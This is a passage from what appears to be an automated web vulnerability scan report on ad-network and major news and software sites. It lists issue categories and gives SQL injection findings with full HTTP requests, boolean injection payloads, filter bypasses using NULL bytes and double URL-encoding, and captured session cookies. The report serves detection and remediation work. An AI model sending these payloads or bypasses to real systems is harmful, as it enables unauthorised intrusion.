19.39. http://www.mtv.com/xd_flux.html

19.40. http://www.yadvertisingblog.com/blog/category/general/

19.41. http://www.yadvertisingblog.com/blog/downloads/

19.42. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblog/images/favicon.png

19.43. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblogimages/img_topbar_arrow.gif

20. File upload functionality

21. TRACE method is enabled

21.1. http://chartupload.com/

21.2. http://cheetah.vizu.com/

21.3. http://puma.vizu.com/

21.4. http://secure-us.imrworldwide.com/

21.5. http://tm.verticalacuity.com/

21.6. http://tracking.hubspot.com/

21.7. http://www.aboutads.info/

22. Email addresses disclosed

22.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

22.2. http://chartupload.com/source/includes/scripts/jquery.dimensions.js

22.3. http://chartupload.com/source/includes/scripts/phpjs_00029.js

22.4. http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18

22.5. http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca

22.6. https://login.yahoo.com/config/login

22.7. http://members.pega.com/common/js/jquery/plugins/jquery.callback.js

22.8. http://members.pega.com/common/js/jquery/plugins/jquery.cookie.js

22.9. http://members.pega.com/common/js/jquery/plugins/jquery.dimensions.js

22.10. http://s.gravatar.com/js/jquery.Jcrop.js

22.11. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110602184226.js

22.12. http://sj.wsj.net/djscript/require/j_global_slim/version/20110611110639.js

22.13. http://sj.wsj.net/djscript/require/j_global_slim/version/20110613193701.js

22.14. http://us.havaianas.com/scripts/scriptaculous/controls.js

22.15. http://us.havaianas.com/scripts/scriptaculous/dragdrop.js

22.16. http://videopress.com/osd.xml

22.17. http://widgets3.flux.com/Widget/Comments/3024/en-US

22.18. http://windows.microsoft.com/Scripts/3.1/s_code.js

22.19. http://www.mtv.com/

22.20. http://www.pega.com/community/groups/pega-developer-network-pdn

23. Private IP addresses disclosed

23.1. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

23.2. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

23.3. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.5. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_long.gif

23.6. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_small_short.gif

23.7. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css

23.8. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/uzHjjRskdHc.js

23.9. http://www.facebook.com/extern/login_status.php

23.10. http://www.facebook.com/extern/login_status.php

23.11. http://www.facebook.com/extern/login_status.php

23.12. http://www.facebook.com/plugins/fan.php

23.13. http://www.facebook.com/plugins/like.php

23.14. http://www.facebook.com/plugins/like.php

23.15. http://www.facebook.com/plugins/like.php

23.16. http://www.facebook.com/plugins/like.php

23.17. http://www.facebook.com/plugins/like.php

23.18. http://www.facebook.com/plugins/like.php

23.19. http://www.facebook.com/plugins/like.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.google.com/sdch/vD843DpA.dct

23.22. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml

24. Social security numbers disclosed

25. Robots.txt file

25.1. http://0.gravatar.com/avatar/ec595f306c9ab9861b31f653da65bf5a

25.2. http://1.gravatar.com/avatar/1404aa006cbd4ccf1e1969ff0ed8d2d3

25.3. http://2.gravatar.com/avatar/c63392ca320086522cf4d55cbf1d3808

25.4. http://a.analytics.yahoo.com/p.pl

25.5. http://a.tribalfusion.com/j.ad

25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

25.7. http://ad.yieldmanager.com/st

25.8. http://ads.bluelithium.com/pixel

25.9. http://ads.pointroll.com/PortalServe/

25.10. http://advertising.yahoo.com/favicon.ico

25.11. http://advertisingcentral.yahoo.com/

25.12. http://api.bizographics.com/v1/profile.json

25.13. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

25.14. http://aux1.forexfactory.com/www/delivery/ai.php

25.15. http://b.scorecardresearch.com/beacon.js

25.16. http://b.voicefive.com/p

25.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.18. http://cheetah.vizu.com/a.gif

25.19. http://cm.mtv.overture.com/js_flat_1_0/

25.20. http://d3.zedo.com/jsc/d3/ff2.html

25.21. http://d7.zedo.com/img/d3/x.gif

25.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

25.23. http://en.gravatar.com/

25.24. http://en.search.wordpress.com/opensearch.xml

25.25. http://en.wordpress.com/signup/

25.26. https://en.wordpress.com/signup/

25.27. http://farm1.static.flickr.com/70/buddyicons/11988005@N00.jpg

25.28. http://farm2.static.flickr.com/1311/buddyicons/29208959@N03.jpg

25.29. http://farm3.static.flickr.com/2157/buddyicons/12951874@N00.jpg

25.30. http://farm4.static.flickr.com/3023/buddyicons/41047258@N00.jpg

25.31. http://farm5.static.flickr.com/4002/buddyicons/14646162@N03.jpg

25.32. http://farm6.static.flickr.com/5091/buddyicons/60432067@N07.jpg

25.33. http://feeds.bbci.co.uk/news/rss.xml

25.34. http://fls.doubleclick.net/activityi

25.35. http://go.microsoft.com/fwlink/

25.36. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052525703/

25.37. http://i0.poll.fm/js/production/public-home.js

25.38. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

25.39. http://js.microsoft.com/library/svy/windows/broker-config.js

25.40. http://l.addthiscdn.com/live/t00/250lo.gif

25.41. http://m1.zedo.com/log/p.gif

25.42. http://mswindowswolglobal.112.2o7.net/b/ss/mswindowswolglobal,mswindowswolenus,mswindowswol2dev,mswindowswoldev/1/H.17/s25014962418936

25.43. http://mtv.mtvnimages.com/uri/mgid:uma:video:mtv.com:659840

25.44. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

25.45. http://now.eloqua.com/visitor/v200/svrGP.asp

25.46. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s26861636964604

25.47. http://online.wsj.com/static_html_files/jsframe.html

25.48. http://p.opt.fimserve.com/bht/

25.49. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

25.50. http://puma.vizu.com/cdn/00/00/21/00/smart_tag.js

25.51. http://s.gravatar.com/js/jquery.Jcrop.js

25.52. http://s0.wp.com/wp-content/themes/h4/style.css

25.53. http://s1.wp.com/wp-content/themes/h4/js/scripts.js

25.54. http://s2.wp.com/imgpress

25.55. http://s7.addthis.com/js/250/addthis_widget.js

25.56. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

25.57. http://spe.atdmt.com/ds/UXULASONYSPE/Bad_Teacher/bt_728x90_date.jpg

25.58. http://speed.pointroll.com/PointRoll/Media/Banners/Wrigley/866687/cp_backup_728x90.jpg

25.59. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.60. http://t.pointroll.com/PointRoll/Track/

25.61. http://tcr.tynt.com/javascripts/Tracer.js

25.62. http://tm.verticalacuity.com/vat/visitT

25.63. http://us.adserver.yahoo.com/a

25.64. http://us.bc.yahoo.com/b

25.65. http://us.havaianas.com/MYOH.html

25.66. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

25.67. http://videopress.com/

25.68. http://www.aboutads.info/modules/book/book.css

25.69. http://www.alexa.com/

25.70. http://www.bizographics.com/collect/

25.71. http://www.facebook.com/extern/login_status.php

25.72. http://www.flickr.com/apps/badge/badge_iframe.gne

25.73. http://www.google-analytics.com/__utm.gif

25.74. http://www.googleadservices.com/pagead/conversion/1052525703/

25.75. http://www.microsoft.com/ie

25.76. http://www.mtv.com/favicon.ico

25.77. http://www.pega.com/

26. Cacheable HTTPS response

26.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

26.2. https://en.wordpress.com/lang-guess-ajax.php

26.3. https://en.wordpress.com/signup/

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

27.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

27.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

27.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

27.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

27.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

27.7. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

27.8. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

27.9. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

27.10. http://ad.doubleclick.net/adi/mtv.mtvi/survey

27.11. http://ads.pointroll.com/PortalServe/

27.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.13. http://d3.zedo.com/jsc/d3/ff2.html

27.14. http://fls.doubleclick.net/activityi

27.15. http://fluxstatic.com/favicon.ico

27.16. http://now.eloqua.com/visitor/v200/svrGP.asp

27.17. http://platform.twitter.com/widgets/follow_button.html

27.18. http://platform0.twitter.com/widgets/follow_button.html

27.19. http://static0.fluxstatic.com/favicon.ico

27.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

27.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

27.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

27.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

27.24. http://www.livewithoscar.com/favicon.ico

27.25. http://www.livewithoscar.com/images/misc/calendar_impact_high.gif

27.26. http://www.livewithoscar.com/images/misc/calendar_impact_low.gif

27.27. http://www.livewithoscar.com/images/misc/calendar_impact_medium.gif

27.28. http://www.livewithoscar.com/images/misc/nonec.gif

27.29. http://www.mtv.com/games/arcade/game/play.jhtml

27.30. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml

27.31. http://www.mtv.com/global/music/scripts/includes/geo.jhtml

27.32. http://www.mtv.com/global/scripts/special/projx.jhtml

27.33. http://www.mtv.com/xd_flux.html

27.34. http://www.pega.com/welcome-info-ajax.php

28. Content type incorrectly stated

28.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

28.2. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

28.3. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json

28.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.5. http://catrg.peer39.net/301/358/2034929301

28.6. http://community.mtv.com/Overlays/LogIn.aspx

28.7. http://cs.wsj.net/community/content/images/misc/groups/industriesrolodex.80x80.png

28.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

28.9. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

28.10. http://d.yimg.com/ce/soup/soup_generated_fragment.gne

28.11. http://fluxstatic.com/favicon.ico

28.12. http://l.apture.com/v3/

28.13. http://now.eloqua.com/visitor/v200/svrGP.asp

28.14. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

28.15. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137

28.16. http://s2.wp.com/mshots/v1/http%3A%2F%2Fbengunby.wordpress.com%2F2011%2F06%2F13%2Fits-not-wrong-to-be-happy-lebron-james-lost%2F

28.17. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

28.18. http://static0.fluxstatic.com/favicon.ico

28.19. http://us.havaianas.com/scripts/jquery/jquery.bgiframe.min.js

28.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

28.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

28.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

28.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

28.24. http://www.facebook.com/extern/login_status.php

28.25. http://www.flickr.com/fragment.gne

28.26. http://www.forexfactory.com/favicon.ico

28.27. http://www.livewithoscar.com/CuteSoft_Client/CuteEditor/Load.ashx

28.28. http://www.mtv.com/global/music/images/WDK3/btn-add-to-favorites.jpg

28.29. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml

28.30. http://www.mtv.com/global/music/scripts/includes/geo.jhtml

28.31. http://www.mtv.com/global/scripts/special/projx.jhtml

28.32. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

28.33. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx

29. Content type is not specified



1. SQL injection  next
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [;page parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_main_story

Issue detail

The ;page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6959
Date: Tue, 14 Jun 2011 00:14:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 26 09:23:24 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1489
Date: Tue, 14 Jun 2011 00:14:52 GMT

document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344415&PluID=0&w=300&h=250&ord=3195412&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=
...[SNIP]...

1.2. http://js.microsoft.com/library/svy/windows/broker-config.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://js.microsoft.com
Path:   /library/svy/windows/broker-config.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /library/svy'%20and%201%3d1--%20/windows/broker-config.js?1308011696285 HTTP/1.1
Host: js.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; WT_NVR=0=/:1=library:2=library/svy42058680'%20or%201%3d1--%20:3=library/svy42058680'%20or%201%3d1--%20/sto; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; MS0=52319cad089b46ffaf7cb2f75a658057; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438673600500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 23620
Cache-Control: no-cache
Expires: Tue, 14 Jun 2011 00:36:52 GMT
Date: Tue, 14 Jun 2011 00:36:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<!--CPUMeter: Total CPU: 00:00:00.0936006, User CPU: 00:00:00.0780005, Priv CPU: 00:00:00.0156001, Elapsed: 00:00:04.5708000, Usage: 0.0204779469677081 -->

</body></html>

Request 2

GET /library/svy'%20and%201%3d2--%20/windows/broker-config.js?1308011696285 HTTP/1.1
Host: js.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; WT_NVR=0=/:1=library:2=library/svy42058680'%20or%201%3d1--%20:3=library/svy42058680'%20or%201%3d1--%20/sto; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; MS0=52319cad089b46ffaf7cb2f75a658057; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438328700300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 23579
Cache-Control: no-cache
Expires: Tue, 14 Jun 2011 00:36:52 GMT
Date: Tue, 14 Jun 2011 00:36:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<!--CPUMeter: Total CPU: 00:00:00, User CPU: 00:00:00, Priv CPU: 00:00:00, Elapsed: 00:00:00.5304000, Usage: 0 -->

</body></html>

1.3. http://l.apture.com/v3/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18030734'%20or%201%3d1--%20 and 18030734'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP&118030734'%20or%201%3d1--%20=1 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Error
Content-Type: text/javascript
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:58 GMT
Connection: close

{}

Request 2

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP&118030734'%20or%201%3d2--%20=1 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:58 GMT
Connection: close

{}

1.4. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s22808814137242 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s22808814137242

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

